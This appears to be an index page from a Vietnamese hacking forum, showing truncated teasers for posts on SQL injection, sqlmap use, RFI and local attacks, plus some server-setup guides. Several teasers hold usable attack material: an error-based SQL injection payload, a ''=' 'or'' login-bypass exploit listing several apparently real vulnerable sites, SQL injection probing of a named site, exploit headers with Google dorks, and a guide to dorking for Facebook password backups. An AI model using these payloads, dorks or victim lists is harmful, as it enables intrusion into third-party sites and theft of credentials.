Cách bảo vệ Admincp của diễn đàn Vbulletin​

Những việc mà các bạn cần tìm hiểu và làm đó là: 1. Đổi tên (rename) cho cái thư mục admincp gốc của nó thành 1 cái tên khác mà các bạn chắc chắn chỉ có các admin có thể biết. Nhưng không sửa lại path trong file /includes/config.php. Ai không biết rename thì pm sent user + pass vps hay host qua inbox ccb Drop dùm cho ) vd: Aitimduocadmincpnaykhong 2....

Xem Thêm

SQL UNHEX --- 403 --- LIMIT.

SQL UNHEX --- 403 --- LIMIT. Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS http://ibms.co/about.php?pid=34 ### is ok ### http://ibms.co/about.php?pid=34' ### error ## Fatal error: Call to a member function...

Xem Thêm

Cài Đặt Apache2 Với Php5 Và Hỗ Trợ Mysql Trên Ubuntu 11.10

LAMP là chữ viết tắt thường được dùng để chỉ sự sử dụng các phần mềm Linux, Apache, MySQL và ngôn ngữ văn lệnh PHP hay Perl hay Python để tạo nên một môi trường máy chủ Web có khả năng chứa và phân phối các trang Web động. Bài viết sau sẽ hướng dẫn các bạn cài đặt máy chủ web Apache2 trên Ubuntu 11.10 server với PHP5 hỗ trợ cho mod_php...

Xem Thêm

Hướng dẫn sử dụng SqlMap Backtrack 5

Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5. Quote: [dbname] = Database name; [tbname] = Table name; [cmname] = Column name. 1. Open up sqlmap This image has been resized.Click to view original image 2. One we load the terminal, we wanna find a vunerable site. Use...

Xem Thêm

MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

########################### # Mybb Ajaxfs Plugin Sql Injection vulnerability ########################### ################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ ...

Xem Thêm

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

Ví dụ victim có dạng: http://target.com/page.php?id = 1 Lệnh get version, database http://target.com/page.php?id = 1 [color=#ffffffff]And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)[/color] Tương tự vậy, lệnh get table: And (Select 1 From( Select Count(*),...

Xem Thêm

Backdoor trong modem D-Link và khai thác

Một người bạn đã đưa cho tôi bài viết này. Backdoor trong modem D-Link và khai thác với chrome reverse engineering đối với firmware của modem D-Link và phát hiện trong đó có một cách có thể để bất cứ người nào truy cập trực tiếp vào modem D-Link. Rõ ràng đây là dụng ý của nhà sản xuất firmware…Đoạn code có dạng: Mã:...

Xem Thêm

WordPress Curvo Themes - CSRF File Upload

################################################## ################################################# # Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability # Author: Byakuya # Date: 10/26/2013 # Vendor Homepage: http://themeforest.net/ # Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/ # Infected File: upload_handler.php # Google dork: inurl:/wp-content/themes/curvo/ ##################################################...

Xem Thêm

Hướng dẫn cài đặt XenServer 6 và XenCenter

Yêu cầu hệ thống XenServer chạy trực tiếp trên phần cứng đồng nghĩa với việc sẽ không có bất cứ thứ gì nằm giữa phần cứng và XenServer. Nói cách khác, XenServer đúng nghĩa là một hệ điều hành. Nó sẽ giao tiếp trực tiếp với phần cứng, gồm cả card mạng (NIC) và bộ điều khiển lưu trữ. Chương trình yêu cầu CPU 64 bit kích hoạt Intel VT hoặc AMD-V. Nhưng, đây chỉ là khuyến nghị từ nhà cung cấp. XenServer...

Xem Thêm

Tìm hiểu về Local Attack

I. Khái niệm chung Thông thường, khi host một site lên server thì người dùng sẽ được cấp một tài khoản người dùng và một thư mục để quản lý site của mình. Ví dụ tài khoản user1 được cấp thư mục /home/user1 để quản lý site của user1. Tương tự như vậy, tài khoản user2 được cấp thư mục /home/user2 để quản lý site của user2. Bằng cách nào đó, hacker có thể chiếm giữ /home/user2 và dùng các script...

Xem Thêm

Hacking Website using RFI Method

RFI là gì (Remote File Inclusion)Remote File Inclusion (RFI) là một loại tổn thương thường thấy nhất trên các trang web. Nó cho phép kẻ tấn công bao gồm một tập tin từ xa, thường là thông qua một kịch bản trên máy chủ web. Dễ bị tổn thương xảy ra do việc sử dụng của người dùng cung cấp đầu vào mà không xác nhận thích hợp. Điều này có thể dẫn đến một cái gì đó như tối thiểu như xuất ra các nội dung...

Xem Thêm

Sqlmap plugin for BurpSuite

Nếu bạn là 1 pentester, chắc hẳn không lạ gì 2 công cụ rất phổ biến là sqlmap và burpsuite. Nhưng kết hợp chúng lại với nhau để làm việc như là 1 công cụ thì chắc nhiều người chưa biết. Sau đây là tutorial của namhb về việc kết hợp này. Đầu tiên, chúng ta download plugin sqlmap của burpsuite về: Download SQLmap plugin for Brupsuite at:...

Xem Thêm

HOW TO USE GOOGLE TO FIND FACEBOOK AND OTHER PASSWORD BACKUPS!!

HOW TO USE GOOGLE TO FIND FACEBOOK AND OTHER PASSWORD BACKUPS!! Prerequisites: (This one is Easy!) 1. A modern web browser (i recommend Firefox or Google Chrome) and Internet (Duh, Broadband). 2. Time In order for these to work, all you have to do is simply copy and paste the dork into Google and search it Method 1: Facebook! We...

Xem Thêm

Powered by Cyberjee Bypass Login Page Vulnerability

# Exploit : Login page bypass # # Location : [Target]/login.php Location 2 : [Target]/admin # # Username : '=' 'or' # # Password : '=' 'or' ###################### # Proof: # # http://www.dumarsgrill.com/admin/index.php # # http://www.tripplesperfumes.com/login.php # # http://johnnyswatches.com/admin/ # # http://www.timefactoryinc.com/admin/admin_panel.php # # http://www.blakesbarbq.biz/admin/index.php # # # #...

Xem Thêm

Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước để local một victim.

Bài viết này dựa trên kinh nghiệm cũng như những kiến thức mà mình thấy cần thiết nhất và dễ hiểu nhất để dành cho những bạn nào chưa biết đến Local sau khi đọc xong sẽ biết đến nó và có thể thực hành ở đa số các trường hợp. I. Đầu tiên là đọc sơ cái Định Nghĩa của Local Attack là gì cái nào: Local attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. Nghĩa là tấn công...

Xem Thêm